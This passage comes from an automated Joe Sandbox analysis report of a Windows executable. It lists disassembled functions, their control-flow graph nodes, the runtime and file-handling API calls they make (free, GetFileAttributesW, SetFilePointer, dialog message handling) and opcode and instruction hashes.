                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: 74096AllocGlobal
                                      • String ID: FvnP$PNG
                                      • API String ID: 4246444542-2697718158
                                      • Opcode ID: 9a6a0e1f367bdd2c7f92addf6ba16721d0afa65f14a8009f3db897b211178159
                                      • Instruction ID: 3fae5d86c63c7280e09810827b70fca5f5da643f0bc2f0355a88362db33abc91
                                      • Opcode Fuzzy Hash: 9a6a0e1f367bdd2c7f92addf6ba16721d0afa65f14a8009f3db897b211178159
                                      • Instruction Fuzzy Hash: 5631C275600712AFD7209F21EC88D2FBFB9FF95750B044918F805822A0EB31DC5AEBA1
                                      Function 0051BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1096 51ba27-51ba51 call 5197e5 call 51bb4e call 51b7bb 1103 51ba53-51ba55 1096->1103 1104 51ba57-51ba6c call 518e06 1096->1104 1105 51baaa-51baad 1103->1105 1108 51ba9c 1104->1108 1109 51ba6e-51ba84 call 51bbf0 1104->1109 1110 51ba9e-51baa9 call 518dcc 1108->1110 1113 51ba89-51ba8f 1109->1113 1110->1105 1115 51ba91-51ba96 call 5191a8 1113->1115 1116 51baae-51bab2 1113->1116 1115->1108 1117 51bab4 call 518b6f 1116->1117 1118 51bab9-51bac4 1116->1118 1117->1118 1122 51bac6-51bad0 1118->1122 1123 51badb-51baf5 1118->1123 1122->1123 1124 51bad2-51bada call 518dcc 1122->1124 1123->1110 1125 51baf7-51bafe 1123->1125 1124->1123 1125->1110 1126 51bb00-51bb17 call 51b691 1125->1126 1126->1110 1131 51bb19-51bb23 1126->1131 1131->1110
                                      APIs
                                        • Part of subcall function 005197E5: _free.LIBCMT ref: 0051981C
                                        • Part of subcall function 005197E5: _abort.LIBCMT ref: 00519863
                                        • Part of subcall function 0051BB4E: _abort.LIBCMT ref: 0051BB80
                                        • Part of subcall function 0051BB4E: _free.LIBCMT ref: 0051BBB4
                                      • _free.LIBCMT ref: 0051BA9F
                                      • _free.LIBCMT ref: 0051BAD5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$_abort
                                      • String ID:
                                      • API String ID: 195396716-0
                                      • Opcode ID: 2bdac3e14cb0ad1b92ecd4b73443db9df719052fe67f3589613726bbc834802e
                                      • Instruction ID: aa864410ad8b476ca7c7265721ad49ce183de56a5c981e91639dd75cc7316c44
                                      • Opcode Fuzzy Hash: 2bdac3e14cb0ad1b92ecd4b73443db9df719052fe67f3589613726bbc834802e
                                      • Instruction Fuzzy Hash: 20318431904209AFFB10DBA8D445BED7FF5FF81320F254099E5049B2A2EB315D81DB50
                                      Function 004F1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1132 4f1e50-4f1e7f call 50eb78 call 4f3bba 1136 4f1e84-4f1e86 1132->1136 1137 4f1f0f-4f1f1b 1136->1137 1138 4f1e8c-4f1ebd call 4f1732 call 4f18a9 1136->1138 1140 4f1f1d-4f1f21 1137->1140 1141 4f1f36-4f1f44 1137->1141 1151 4f1ebf-4f1ecc call 501c3b 1138->1151 1152 4f1ece-4f1ed5 1138->1152 1143 4f1f2f-4f1f35 call 513e2e 1140->1143 1144 4f1f23-4f1f2c call 4ff445 1140->1144 1143->1141 1144->1143 1159 4f1efb-4f1f0e call 513e13 call 4f18a9 1151->1159 1154 4f1eee-4f1ef6 call 501b84 1152->1154 1155 4f1ed7-4f1eec call 501bfd 1152->1155 1154->1159 1155->1159 1159->1137
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F1E55
                                        • Part of subcall function 004F3BBA: __EH_prolog.LIBCMT ref: 004F3BBF
                                      • _wcslen.LIBCMT ref: 004F1EFD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog$_wcslen
                                      • String ID:
                                      • API String ID: 2838827086-0
                                      • Opcode ID: b8dd9b41ce0f95bc3f68f1df0764ad5bba4609c500ad2ebeb7173c362371da97
                                      • Instruction ID: 9a8c86e73052a0c9738743250ba5cedb508b08e507c53706b0c0c3b576494b7a
                                      • Opcode Fuzzy Hash: b8dd9b41ce0f95bc3f68f1df0764ad5bba4609c500ad2ebeb7173c362371da97
                                      • Instruction Fuzzy Hash: 2F316B71904209EFCF15EF99C955AEEBBF5BF48304F10006EE945A7261CB365E00CB65
                                      Function 00519869 Relevance: 3.1, APIs: 2, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1165 519869-519880 1167 519882-51988c call 51ae5b 1165->1167 1168 51988e-519895 call 51b136 1165->1168 1167->1168 1173 5198df-5198e6 1167->1173 1172 51989a-5198a0 1168->1172 1174 5198a2 1172->1174 1175 5198ab-5198b9 call 51aeb1 1172->1175 1183 5198e8-5198ed 1173->1183 1176 5198a3-5198a9 call 518dcc 1174->1176 1181 5198bb-5198bc 1175->1181 1182 5198be-5198d4 call 519649 call 518dcc 1175->1182 1186 5198d6-5198dd 1176->1186 1181->1176 1182->1173 1182->1186 1186->1183
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 82c19cc59930148479044948f5556a04315fd3716c6e9e9d5c402059b3907fae
                                      • Instruction ID: 12c21cabf96b2114f6e176f37aea2fdbc7654302f90b1cb15f3068506eed6981
                                      • Opcode Fuzzy Hash: 82c19cc59930148479044948f5556a04315fd3716c6e9e9d5c402059b3907fae
                                      • Instruction Fuzzy Hash: 2601D13A2447027BF32222246CAD9EA2D69FFE3771B250539F50592192FF248C8A6221
                                      Function 004FA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00000001,00000001,?,004FA23A,?,004FA2E9,00000001,00000001,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA254
                                        • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                      • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,004FA23A,?,004FA2E9,00000001,00000001,?,?,004FA175,?,00000001,00000000), ref: 004FA280
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_wcslen
                                      • String ID:
                                      • API String ID: 2673547680-0
                                      • Opcode ID: 155ab4f460581225b1e37b109c5c9472cdb0259b8b7b4232b5be868a8dbf9679
                                      • Instruction ID: b337e14ee19360c40400a1e5c72d8c2502fcfbf30c8e948ef85bd8b3691365b9
                                      • Opcode Fuzzy Hash: 155ab4f460581225b1e37b109c5c9472cdb0259b8b7b4232b5be868a8dbf9679
                                      • Instruction Fuzzy Hash: 5EE09B7150011897CB20AB64CC09BE97758BB193D1F044262FE44E3290D775DD45C6E5
                                      Function 0050DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 0050DEEC
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • SetDlgItemTextW.USER32(00000065,?), ref: 0050DF03
                                        • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                        • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                        • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                        • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                        • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                      • String ID:
                                      • API String ID: 2718869927-0
                                      • Opcode ID: cfa10aa15be04704df02d2c406a46af42375c50ef59751fed6dd178d824b4a10
                                      • Instruction ID: 4e456abd90ec69a87d72a605bf0bdcc964ba2f06edbe828f89b0c0eb08cd9f17
                                      • Opcode Fuzzy Hash: cfa10aa15be04704df02d2c406a46af42375c50ef59751fed6dd178d824b4a10
                                      • Instruction Fuzzy Hash: 51E09B7240034D26EF01A761DC0AFAE3B6C6B15789F440855B304D71F3D97DDA549665
                                      Function 00512B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00512BAA
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00512BB5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                      • String ID:
                                      • API String ID: 1660781231-0
                                      • Opcode ID: 9fbc2cbf7098a0ccd15bd3a9a577eb9399871129a6e056e2e18a5a90625a5fe7
                                      • Instruction ID: df76f163e97f49b456e25c06af9e39eecb761067b7720d6146e399de6d4fa5d8
                                      • Opcode Fuzzy Hash: 9fbc2cbf7098a0ccd15bd3a9a577eb9399871129a6e056e2e18a5a90625a5fe7
                                      • Instruction Fuzzy Hash: EED0A93829C202187E242A70282F4C92F45BE92BB5FA0868AE420C54C1EB1190E4A211
                                      Function 004F12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 587628741e4180e843c1b4ebc0cf5516cf45d51950a47bd163c0a09250a4445b
                                      • Instruction ID: 8216df5fbaefc9fd2bf7e8d8c01f328dc378b63c0af8c4d1b17136598744c707
                                      • Opcode Fuzzy Hash: 587628741e4180e843c1b4ebc0cf5516cf45d51950a47bd163c0a09250a4445b
                                      • Instruction Fuzzy Hash: 95C0123205C600BECB010BB4DC29C2BBBA8ABA5312F04C928B0A9C0060C238C114EB11
                                      Function 004F1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 07dd30d65df1162b0512c4cbe7b8ff4c175b2e5d4fcc86b499d57d849a6c84a9
                                      • Instruction ID: 90f1ec64da93d35c58fdd48bf2634d068da590c0282ebd66740a784ccab2db98
                                      • Opcode Fuzzy Hash: 07dd30d65df1162b0512c4cbe7b8ff4c175b2e5d4fcc86b499d57d849a6c84a9
                                      • Instruction Fuzzy Hash: F6C1C630A00258DFEF15CF68C494BBA7BA5AF15310F0801BFDE459B3A2DB39A945CB65
                                      Function 004F3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 425c796aafe48b101b126dd6986512ba4a32655b07ce476012cdda16a8acd64f
                                      • Instruction ID: 3adc6626ab5a28001ee35ff290c7adb90f76597a586da0c4f60bc6e5039498fd
                                      • Opcode Fuzzy Hash: 425c796aafe48b101b126dd6986512ba4a32655b07ce476012cdda16a8acd64f
                                      • Instruction Fuzzy Hash: 3671C272500B899EDB25DF70C8559FBB7E9AF14305F40082FE3AB87241DA366684CF15
                                      Function 004F9A74 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,004F9A50,?,?,00000000,?,?,004F8CBC,?), ref: 004F9BAB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: adf30d13c7755be5038855f3eda81a2a38813dd0b096ca34db403b5e162b7825
                                      • Instruction ID: b375855a3f1e1d36bbf3bcaced30ec76ffa7c71635f1f79846bd6d95967bb3c0
                                      • Opcode Fuzzy Hash: adf30d13c7755be5038855f3eda81a2a38813dd0b096ca34db403b5e162b7825
                                      • Instruction Fuzzy Hash: 5741CD30A043498BDB24DF15E58467BB7E5FFD5310F148A2FEA8183360D778BC498A59
                                      Function 004F8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F8289
                                        • Part of subcall function 004F13DC: __EH_prolog.LIBCMT ref: 004F13E1
                                        • Part of subcall function 004FA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
